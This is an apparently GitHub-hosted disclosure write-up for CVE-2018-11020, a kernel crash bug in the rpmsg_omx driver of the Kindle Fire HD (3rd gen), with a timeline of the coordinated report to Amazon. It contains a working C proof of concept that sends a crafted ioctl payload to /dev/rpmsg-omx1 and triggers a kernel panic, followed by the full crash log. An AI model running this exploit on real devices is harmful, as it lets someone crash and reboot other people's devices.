Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2018-11020

These page show one of the practical CVEs that Found. I reported these bugs to Security@amazon.com on On 5/11/2018 and now I have been told they have repaired the bugs and the details can be published. However, Amazon does not have an advisory page at the moment. I think it is a must to list the detailed infomation here.

Time Line

  • 5/11/2018 Bugs were reported to Security@amazon.com.
  • 06/27/2018 Amazon got confirmation that CVE-2018-11020 could cause kernel crash.
  • 09/18/2018 Amazon had started updating our FireOS 4 devices with the security patches.

CVE-2018-11020

Abstract

Description

Kernel module /omap/drivers/rpmsg/rpmsg_omx.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device file /dev/rpmsg-omx1 with the command 3221772291, and cause a kernel crash.

To explore this vulnerability, some one must open the device file /dev/rpmsg-omx1, call an ioctl system call on this device file with the command 3221772291 and a crafted payload as the third argument.

PoC

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/rpmsg-omx1 causes the system crash via IOCTL 3221772291.
 * Related buggy struct name is gcicommit.
 * This Poc should run with permission to do ioctl on /dev/rpmsg-omx1.
 *
 * The fowllwing is kmsg of kernel crash infomation:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/rpmsg-omx1";
static command = 3221772291; 

int main(int argc, char **argv, char **env) {
    unsigned int payload[] = { 0xb5d18de2, 0xf6e48a17, 0x9179c429, 0x89a32e03 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }
        
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}


References

MITRE Orgnazation: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11020

Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720

Kindle kernel (version 4.5.5.3 for kindle fire hdx 3rd):

Crash Log

[  146.290710] Unable to handle kernel paging request at virtual address b5d18de6
[  146.299438] pgd = d72dc000
[  146.302795] [b5d18de6] *pgd=00000000
[  146.307281] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[  146.313232] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[  146.320983] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[  146.328308] PC is at ion_free+0xc/0xb4
[  146.332672] LR is at rpmsg_omx_ioctl+0x2cc/0x598
[  146.337890] pc : [<c02e8540>]    lr : [<c048a120>]    psr: 60000013
[  146.337890] sp : c35b5e60  ip : c35b5e80  fp : c35b5e7c
[  146.350860] r10: c35b5ea8  r9 : de88c4d8  r8 : c35b4000
[  146.356872] r7 : dd32b580  r6 : 00000003  r5 : d71d5880  r4 : be92f5f8
[  146.364135] r3 : d71d58ec  r2 : d71d58ec  r1 : b5d18de2  r0 : d7aaaa00
[  146.371551] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  146.379516] Control: 10c5387d  Table: 972dc04a  DAC: 00000015
[  146.386077] 
[  146.386077] PC: 0xc02e84c0:
[  146.391052] 84c0  0a000001 e2871010 ebfddc25 e1a00006 eb0ee904 e5953058 e2433001 e5853058
[  146.401580] 84e0  e3530000 ba000011 1a000009 e1a0200d e3c23d7f e3c3303f e285005c e593300c
[  146.412292] 8500  e593723c e1a01007 ebf90a76 e597321c e585306c e1a00006 eb0ee876 e1a00005
[  146.422821] 8520  ebffffb4 e1a00004 ebf8e011 e89da8f0 e7f001f2 e1a0c00d e92dd878 e24cb004
[  146.433502] 8540  e5915004 e1a04001 e1550000 1a000021 e2856014 e1a00006 eb0ee8e2 e5953010
[  146.444183] 8560  e3530000 0a000005 e243200c e1540002 2a00000a e5933008 e3530000 1afffff9
[  146.454864] 8580  e59f0054 e3001219 e59f2050 e59f3050 ebf58268 e1a00006 eb0ee856 e89da878
[  146.465393] 85a0  85933004 8affffed f57ff05f e1943f9f e2433001 e1842f93 e3320000 1afffffa
[  146.476074] 
[  146.476074] LR: 0xc048a0a0:
[  146.481048] a0a0  33a03000 e3530000 1affffae e24ba05c e1a01004 e3a02008 e1a0000a ebf7305e
[  146.491729] a0c0  e3500000 1affffaa e5950068 e51b1058 ebf97677 e3500000 e50b005c 0a000001
[  146.502380] a0e0  e3700a01 9affffc8 e3a03000 e50b305c eaffffc5 e3e00018 eaffff8e e1a00004
[  146.513061] a100  e1a0100a e3a02008 ebf73154 e3500000 0affff88 eaffffc2 e5950068 ebf97904
[  146.523590] a120  eaffffb9 e24b005c e3a01030 ebf7398b e3a02030 e597003c e1a03006 e58d2000
[  146.534240] a140  e59f1280 e59f2274 ebf99069 e3e0000d eaffff78 e5933004 e7933101 e3530000
[  146.544921] a160  0affff6c e5950068 ebf97651 e2509000 0a000021 e3790a01 8a00001f e5950068
[  146.555603] a180  e1a01009 e24b2064 e24b3060 ebf97447 e3500000 050b905c 0affff9b e59f322c
[  146.566131] 
[  146.566131] SP: 0xc35b5de0:
[  146.571228] 5de0  00000004 d8cc50f4 60010013 00000001 00000001 c02e8540 60000013 ffffffff
[  146.581787] 5e00  c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[  146.592437] 5e20  d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[  146.603118] 5e40  c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[  146.613830] 5e60  d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[  146.624389] 5e80  c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[  146.635070] 5ea0  c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[  146.645599] 5ec0  00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[  146.656158] 
[  146.656158] IP: 0xc35b5e00:
[  146.661254] 5e00  c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[  146.671936] 5e20  d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[  146.682495] 5e40  c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[  146.693176] 5e60  d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[  146.703704] 5e80  c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[  146.714263] 5ea0  c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[  146.724914] 5ec0  00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[  146.735595] 5ee0  d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[  146.746276] 
[  146.746276] FP: 0xc35b5dfc:
[  146.751251] 5dfc  ffffffff c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00
[  146.761779] 5e1c  b5d18de2 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000
[  146.772308] 5e3c  de88c4d8 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013
[  146.783020] 5e5c  ffffffff d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120
[  146.793701] 5e7c  c02e8540 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4
[  146.804382] 5e9c  c35b5ea8 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000
[  146.814941] 5ebc  c35b5f14 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc
[  146.825592] 5edc  00000000 d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74
[  146.836242] 
[  146.836242] R0: 0xd7aaa980:
[  146.841217] a980  00000001 00000001 00000000 00000000 00004007 00000000 00000000 00000000
[  146.851898] a9a0  00000020 00000000 00000000 00000000 00000300 d7aaa9b4 d7aaa9b4 c0248d00
[  146.862518] a9c0  00000093 00000093 0000005d 00000002 00000000 00000000 00000000 00000000
[  146.873077] a9e0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  146.883728] aa00  d763b780 00000000 00000000 deabb480 00000000 00000001 00000000 00000000
[  146.894409] aa20  d7aaaa20 d7aaaa20 00000000 00000105 c0903054 d7157440 00000f30 dcd4f220
[  146.905090] aa40  00000093 00000003 00000017 00000000 00000000 00000000 00000000 00000000
[  146.915618] aa60  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  146.926300] 
[  146.926300] R2: 0xd71d586c:
[  146.931274] 586c  00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[  146.941955] 588c  d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[  146.952636] 58ac  d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[  146.963287] 58cc  00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[  146.973815] 58ec  d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[  146.984497] 590c  00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[  146.995147] 592c  00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[  147.005676] 594c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  147.016357] 
[  147.016357] R3: 0xd71d586c:
[  147.021453] 586c  00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[  147.032012] 588c  d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[  147.042663] 58ac  d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[  147.053314] 58cc  00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[  147.063873] 58ec  d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[  147.074523] 590c  00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[  147.085205] 592c  00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[  147.095886] 594c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  147.106414] 
[  147.106445] R5: 0xd71d5800:
[  147.111541] 5800  d71d5d00 00000000 00000000 dcfc4200 f0000009 00000211 00000001 00000001
[  147.122070] 5820  00000000 00001000 00001000 00000004 00000000 d71d5844 c01519dc d89b54c0
[  147.132751] 5840  c01576ac c10dc870 00001000 00000000 c0a10230 c0a10dc0 d1a1dd58 c006f724
[  147.143432] 5860  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  147.154083] 5880  dd32b5c8 dd32b5c8 dd32b580 d71d588c d71d588c 00000000 00000000 00000000
[  147.164611] 58a0  00000001 00000000 00000000 d71d58ac d71d58ac 00000000 00000000 00000000
[  147.175140] 58c0  d71d58c0 d71d58c0 00000000 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0
[  147.185821] 58e0  00000000 00000000 d7aaaa00 d71d58ec d71d58ec 00000000 00000000 00000000
[  147.196472] 
[  147.196502] R7: 0xdd32b500:
[  147.201446] b500  e2401000 f400f000 0202420f 0000c000 f400f000 dd071d20 00000000 d8f0a680
[  147.212127] b520  d8f0a740 00000000 00000000 00000001 00000000 00000000 00000000 00000000
[  147.222656] b540  00000000 00000000 00000001 00000000 00000000 00000000 00000000 00000000
[  147.233184] b560  00000000 00000000 c153f430 00001000 00000000 00000000 00000000 00000000
[  147.243865] b580  00000000 dd32b584 dd32b584 00000000 00000000 c0a16c60 00000000 00000002
[  147.254547] b5a0  00000001 00000000 c06faab0 de88c61c de88c61c 0f700001 00000001 d8caa000
[  147.265075] b5c0  dd0f7200 00000001 d71d5880 d71d5880 00000001 00000000 00000000 dd32b5dc
[  147.275756] b5e0  dd32b5dc 00000000 7fffffff 00000000 00000000 dd32b5f4 dd32b5f4 00000000
[  147.286407] 
[  147.286407] R8: 0xc35b3f80:
[  147.291381] 3f80  66eff968 00000000 000000f0 c0013e08 c35b2000 00000000 00000000 c35b3fa8
[  147.302032] 3fa0  c0013c60 c009a164 66eff978 66eff968 66eff978 00000080 00000000 00000000
[  147.312713] 3fc0  66eff978 66eff968 00000000 000000f0 00000000 00000000 00000000 41d1f6a8
[  147.323272] 3fe0  00000000 6716ebc8 400710f8 40083b80 600f0010 66eff978 00760061 00000061
[  147.333923] 4000  00000000 00000002 00000000 d7157440 c0a0e840 00000000 00000015 d726ee00
[  147.344604] 4020  d8d2c700 c35b4000 c09ddc50 d7157440 d8db57c0 c1617b40 c35b5b4c c35b5a98
[  147.355133] 4040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[  147.365814] 4060  0087d4c0 5ebfe27f 00000000 00000000 00000000 00000000 00000000 00000000
[  147.376464] 
[  147.376495] R9: 0xde88c458:
[  147.381469] c458  de88c458 de88c458 00000000 00000000 00000000 c06bc674 000200da c09dda58
[  147.392150] c478  00000000 00000000 de88c480 de88c480 00000000 de88c48c de88c48c 00000000
[  147.402801] c498  5aefcde6 00000000 00000000 00000000 de88c4b0 28cfd730 00000000 00000000
[  147.413330] c4b8  00200000 00000000 00000000 de88c4c4 de88c4c4 d8cbdf00 d8cbdf00 00000000
[  147.424011] c4d8  000521b0 00000402 00000402 00000000 00000000 00000000 c06b9600 dd160400
[  147.434661] c4f8  de88c5b0 d8c81030 00000f98 00000001 0f700001 5aefcde6 199c82ca 5aefcde6
[  147.445312] c518  199c82ca 5aefcde6 199c82ca 00000000 00000000 00000000 00000000 00000000
[  147.455871] c538  00000000 00000000 00000000 00000000 00000001 00000000 00000000 de88c554
[  147.466522] 
[  147.466522] R10: 0xc35b5e28:
[  147.471588] 5e28  be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8 c35b5ea8 c35b5e7c
[  147.482269] 5e48  c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff d71d58ec be92f5f8
[  147.492950] 5e68  d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540 c35b5edc c35b5e90
[  147.503631] 5e88  c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8 c00723a0 000fffff
[  147.514160] 5ea8  b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14 00000000 00000001
[  147.524688] 5ec8  de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000 d72400c0 00000004
[  147.535339] 5ee8  d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08 c0136044 c0489e60
[  147.546020] 5f08  00000000 00000000 00000000 00000001 00000000 dd055190 dd5e7f68 c35b5f0c
[  147.556579] Process rpmsg_omx_ioctl (pid: 3888, stack limit = 0xc35b42f8)
[  147.564270] Stack: (0xc35b5e60 to 0xc35b6000)
[  147.569213] 5e60: d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[  147.578430] 5e80: c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[  147.587646] 5ea0: c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[  147.596740] 5ec0: 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[  147.605957] 5ee0: d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[  147.615173] 5f00: c0136044 c0489e60 00000000 00000000 00000000 00000001 00000000 dd055190
[  147.624389] 5f20: dd5e7f68 c35b5f0c c35b4000 be92f628 be92f5f8 c0085803 d72400c0 00000004
[  147.633483] 5f40: c35b4000 00000000 c35b5f64 00000000 be92f5f8 c0085803 d72400c0 00000004
[  147.642730] 5f60: c35b4000 00000000 c35b5fa4 c35b5f78 c01365e0 c0135fc4 00000000 00000000
[  147.651947] 5f80: 00000400 be92f628 00010e54 00000000 00000036 c0013e08 00000000 c35b5fa8
[  147.661010] 5fa0: c0013c60 c0136578 be92f628 00010e54 00000004 c0085803 be92f5f8 be92f5f8
[  147.670104] 5fc0: be92f628 00010e54 00000000 00000036 00000000 00000000 00000000 be92f614
[  147.679321] 5fe0: 00000000 be92f5dc 00010690 0002917c 60000010 00000004 00000017 579e6e78
[  147.688537] Backtrace: 
[  147.691558] [<c02e8534>] (ion_free+0x0/0xb4) from [<c048a120>] (rpmsg_omx_ioctl+0x2cc/0x598)
[  147.701049]  r6:00000003 r5:d71d5880 r4:be92f5f8 r3:d71d58ec
[  147.708068] [<c0489e54>] (rpmsg_omx_ioctl+0x0/0x598) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[  147.717956] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[  147.727203] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  147.736450]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:be92f628
[  147.744873] Code: e7f001f2 e1a0c00d e92dd878 e24cb004 (e5915004) 
[  147.754913] Board Information: 
[  147.754913]  Revision : 0001
[  147.754943]  Serial	: 0000000000000000
[  147.754943] SoC Information:
[  147.754943]  CPU	: OMAP4470
[  147.754943]  Rev	: ES1.0
[  147.754974]  Type	: HS
[  147.754974]  Production ID: 0002B975-000000CC
[  147.754974]  Die ID	: 1CC60000-50002FFF-0B00935D-11007004
[  147.755004] 
[  147.794616] ---[ end trace 50912198cfc81720 ]---
[  147.799957] Kernel panic - not syncing: Fatal exception
[  147.805847] CPU0: stopping
[  147.808959] Backtrace: 
[  147.812133] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[  147.821502]  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[  147.828643] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[  147.837860] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[  147.847259] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[  147.856567] Exception stack(0xdd187b38 to 0xdd187b80)
[  147.862243] 7b20:                                                       00000002 00000002
[  147.871459] 7b40: 00000002 00000001 dd187bbc c1621100 c1621100 00c6a000 c1621108 00000001
[  147.880676] 7b60: 00000001 dd187bac 00000002 dd187b80 c002398c c009ae48 200d0013 ffffffff
[  147.889892]  r6:ffffffff r5:200d0013 r4:c009ae48 r3:c002398c
[  147.896911] [<c009add0>] (generic_exec_single+0x0/0x98) from [<c009af78>] (smp_call_function_single+0x110/0x1e0)
[  147.908325] [<c009ae68>] (smp_call_function_single+0x0/0x1e0) from [<c009b28c>] (smp_call_function_many+0x244/0x294)
[  147.920104] [<c009b048>] (smp_call_function_many+0x0/0x294) from [<c009b48c>] (smp_call_function+0x48/0x74)
[  147.931030] [<c009b444>] (smp_call_function+0x0/0x74) from [<c04310f4>] (cpuidle_latency_notify+0x20/0x28)
[  147.941864]  r4:ffffffff r3:c04310d4
[  147.946258] [<c04310d4>] (cpuidle_latency_notify+0x0/0x28) from [<c06a7154>] (notifier_call_chain+0x4c/0x8c)
[  147.957305] [<c06a7108>] (notifier_call_chain+0x0/0x8c) from [<c006ebc0>] (__blocking_notifier_call_chain+0x50/0x68)
[  147.969085]  r8:200d0013 r7:000000a0 r6:00000000 r5:ffffffff r4:c0a11df8
[  147.977020] r3:ffffffff
[  147.980499] [<c006eb70>] (__blocking_notifier_call_chain+0x0/0x68) from [<c006ebf8>] (blocking_notifier_call_chain+0x20/0x28)
[  147.993133]  r7:de95183c r6:000000a0 r5:0000115c r4:c0a11d98
[  148.000152] [<c006ebd8>] (blocking_notifier_call_chain+0x0/0x28) from [<c0088eec>] (pm_qos_update_target+0xf8/0x19c)
[  148.011932] [<c0088df4>] (pm_qos_update_target+0x0/0x19c) from [<c008909c>] (pm_qos_update_request+0x5c/0x8c)
[  148.023071] [<c0089040>] (pm_qos_update_request+0x0/0x8c) from [<c0411b18>] (omap_i2c_xfer+0x2bc/0x6c8)
[  148.033599]  r5:dd187da0 r4:00000000
[  148.038024] [<c041185c>] (omap_i2c_xfer+0x0/0x6c8) from [<c040e5cc>] (i2c_transfer+0xb8/0xf8)
[  148.047637] [<c040e514>] (i2c_transfer+0x0/0xf8) from [<c040e930>] (i2c_smbus_xfer+0x278/0x588)
[  148.057434] [<c040e6b8>] (i2c_smbus_xfer+0x0/0x588) from [<c040eedc>] (i2c_smbus_read_word_data+0x3c/0x4c)
[  148.068267] [<c040eea0>] (i2c_smbus_read_word_data+0x0/0x4c) from [<c0418760>] (bq27541_i2c_read.constprop.7+0x20/0x54)
[  148.080200] [<c0418740>] (bq27541_i2c_read.constprop.7+0x0/0x54) from [<c04189f0>] (battery_handle_work+0x120/0x6a4)
[  148.091857]  r5:dd187e92 r4:dd08b920
[  148.096374] [<c04188d0>] (battery_handle_work+0x0/0x6a4) from [<c0063278>] (process_one_work+0x150/0x468)
[  148.107116] [<c0063128>] (process_one_work+0x0/0x468) from [<c00638c4>] (worker_thread+0x13c/0x320)
[  148.117156] [<c0063788>] (worker_thread+0x0/0x320) from [<c0068af4>] (kthread+0x90/0x9c)
[  148.126312] [<c0068a64>] (kthread+0x0/0x9c) from [<c004cd64>] (do_exit+0x0/0x7e0)
[  148.134765]  r6:c004cd64 r5:c0068a64 r4:dd0aded4
[  148.140533] CPU0 PC (0) : 0xc0019b2c
[  148.144714] CPU0 PC (1) : 0xc0019b2c
[  148.148773] CPU0 PC (2) : 0xc0019b2c
[  148.152832] CPU0 PC (3) : 0xc0019b2c
[  148.156890] CPU0 PC (4) : 0xc0019b2c
[  148.161071] CPU0 PC (5) : 0xc0019b2c
[  148.165130] CPU0 PC (6) : 0xc0019b2c
[  148.169189] CPU0 PC (7) : 0xc0019b2c
[  148.173370] CPU0 PC (8) : 0xc0019b2c
[  148.177429] CPU0 PC (9) : 0xc0019b2c
[  148.181488] CPU1 PC (0) : 0xc003ee38
[  148.185668] CPU1 PC (1) : 0xc003ee54
[  148.189727] CPU1 PC (2) : 0xc003ee54
[  148.193786] CPU1 PC (3) : 0xc003ee54
[  148.197967] CPU1 PC (4) : 0xc003ee54
[  148.202026] CPU1 PC (5) : 0xc003ee54
[  148.206085] CPU1 PC (6) : 0xc003ee54
[  148.210266] CPU1 PC (7) : 0xc003ee54
[  148.214324] CPU1 PC (8) : 0xc003ee54
[  148.218383] CPU1 PC (9) : 0xc003ee54
[  148.222442] 
[  148.224365] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[  148.224365]